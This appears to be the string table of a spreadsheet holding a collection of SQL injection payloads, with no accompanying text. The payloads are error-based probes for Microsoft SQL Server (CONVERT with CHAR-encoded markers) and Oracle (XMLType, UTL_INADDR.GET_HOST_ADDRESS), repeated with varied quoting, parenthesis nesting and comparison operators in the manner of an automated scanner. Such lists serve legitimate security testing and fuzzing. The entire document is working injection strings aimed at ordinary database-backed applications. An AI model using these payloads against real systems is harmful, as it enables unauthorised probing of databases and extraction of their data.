    <t>' )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( 'YNny' = 'YNny</t>
  </si>
  <si>
    <t>'  )  )   AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  'oISz' = 'oISz</t>
  </si>
  <si>
    <t>'  )  )   )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( 'mBsh' = 'mBsh</t>
  </si>
  <si>
    <t>' AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND 'EyJY' = 'EyJY</t>
  </si>
  <si>
    <t>' )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( 'xEYQ' LIKE 'xEYQ</t>
  </si>
  <si>
    <t>'  )  )   AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  'Xsld' LIKE 'Xsld</t>
  </si>
  <si>
    <t>'  )  )   )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( 'hZcS' LIKE 'hZcS</t>
  </si>
  <si>
    <t>' AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND 'mWQU' LIKE 'mWQU</t>
  </si>
  <si>
    <t>" )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( "oliG" = "oliG</t>
  </si>
  <si>
    <t>"  )  )   AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  "oucf" = "oucf</t>
  </si>
  <si>
    <t>"  )  )   )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( "YSXi" = "YSXi</t>
  </si>
  <si>
    <t>" AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND "Cgno" = "Cgno</t>
  </si>
  <si>
    <t>" )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( "xQOy" LIKE "xQOy</t>
  </si>
  <si>
    <t>"  )  )   AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  "JRRe" LIKE "JRRe</t>
  </si>
  <si>
    <t>"  )  )   )  AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( "Uart" LIKE "Uart</t>
  </si>
  <si>
    <t>" AND 942 = CONVERT ( INT, ( CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 942 = 942 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND "yBBx" LIKE "yBBx</t>
  </si>
  <si>
    <t xml:space="preserve"> )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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">"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</si>
  <si>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AND  ( 5083 = 5083</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  4234 = 4234</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( 7819 = 7819</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   ) </t>
  </si>
  <si>
    <t>' )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( 'WeUQ' = 'WeUQ</t>
  </si>
  <si>
    <t>'  )  )   AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  'tDlp' = 'tDlp</t>
  </si>
  <si>
    <t>'  )  )   )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( 'cKDx' = 'cKDx</t>
  </si>
  <si>
    <t>' AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND 'Homw' = 'Homw</t>
  </si>
  <si>
    <t>' )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( 'mfiJ' LIKE 'mfiJ</t>
  </si>
  <si>
    <t>'  )  )   AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  'XzsE' LIKE 'XzsE</t>
  </si>
  <si>
    <t>'  )  )   )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( 'fclk' LIKE 'fclk</t>
  </si>
  <si>
    <t>' AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND 'xlRp' LIKE 'xlRp</t>
  </si>
  <si>
    <t>" )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( "iFda" = "iFda</t>
  </si>
  <si>
    <t>"  )  )   AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  "RVYD" = "RVYD</t>
  </si>
  <si>
    <t>"  )  )   )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( "atPN" = "atPN</t>
  </si>
  <si>
    <t>" AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND "oAKb" = "oAKb</t>
  </si>
  <si>
    <t>" )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND  ( "EWQE" LIKE "EWQE</t>
  </si>
  <si>
    <t>"  )  )   AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (  "dZiR" LIKE "dZiR</t>
  </si>
  <si>
    <t>"  )  )   )  AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND   (  (   ( "PLAN" LIKE "PLAN</t>
  </si>
  <si>
    <t>" AND 1917 IN   (  (  CHAR ( 58 ) +CHAR ( 99 ) +CHAR ( 108 ) +CHAR ( 122 ) +CHAR ( 58 ) + ( SELECT  ( CASE WHEN  ( 1917 = 1917 )  THEN CHAR ( 49 )  ELSE CHAR ( 48 )  END  )  )  +CHAR ( 58 ) +CHAR ( 120 ) +CHAR ( 105 ) +CHAR ( 100 ) +CHAR ( 58  )  )   )  AND "dbrF" LIKE "dbrF</t>
  </si>
  <si>
    <t xml:space="preserve"> )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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">' AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL ) </t>
  </si>
  <si>
    <t xml:space="preserve">"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</si>
  <si>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AND  ( 1543 = 1543</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (  2407 = 2407</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (   ( 2293 = 2293</t>
  </si>
  <si>
    <t xml:space="preserve"> AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL ) </t>
  </si>
  <si>
    <t>' )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND  ( 'yQnP' = 'yQnP</t>
  </si>
  <si>
    <t>'  )  )   AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (  'fBKN' = 'fBKN</t>
  </si>
  <si>
    <t>'  )  )   )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (   ( 'vEwE' = 'vEwE</t>
  </si>
  <si>
    <t>' AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND 'VLDv' = 'VLDv</t>
  </si>
  <si>
    <t>' )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND  ( 'XLXY' LIKE 'XLXY</t>
  </si>
  <si>
    <t>'  )  )   AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (  'fYmV' LIKE 'fYmV</t>
  </si>
  <si>
    <t>'  )  )   )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (   ( 'qWFh' LIKE 'qWFh</t>
  </si>
  <si>
    <t>' AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND 'UyxR' LIKE 'UyxR</t>
  </si>
  <si>
    <t>" )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND  ( "tLyS" = "tLyS</t>
  </si>
  <si>
    <t>"  )  )   AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (  "KioN" = "KioN</t>
  </si>
  <si>
    <t>"  )  )   )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (   ( "nqAF" = "nqAF</t>
  </si>
  <si>
    <t>" AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND "WBBV" = "WBBV</t>
  </si>
  <si>
    <t>" )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND  ( "TUHZ" LIKE "TUHZ</t>
  </si>
  <si>
    <t>"  )  )   AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (  "aOlX" LIKE "aOlX</t>
  </si>
  <si>
    <t>"  )  )   )  AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND   (  (   ( "OfVp" LIKE "OfVp</t>
  </si>
  <si>
    <t>" AND 4605 =  ( SELECT UPPER ( XMLType ( CHR ( 60 ) ||CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 4605 = 4605 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58 ) ||CHR ( 62  )  )   )  FROM DUAL )  AND "KlNO" LIKE "KlNO</t>
  </si>
  <si>
    <t xml:space="preserve"> )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">' )  AND 9217 = UTL_INADDR.GET_HOST_ADDRESS ( CHR ( 58 ) ||CHR ( 99 ) ||CHR ( 108 ) ||CHR ( 122 ) ||CHR ( 58 ) || ( SELECT  ( CASE WHEN  ( 9217 = 9217 )  THEN 1 ELSE 0 END )  FROM DUAL ) ||CHR ( 58 ) ||CHR ( 120 ) ||CHR ( 105 ) ||CHR ( 100 ) ||CHR ( 58  )  )  </t>
  </si>
  <si>
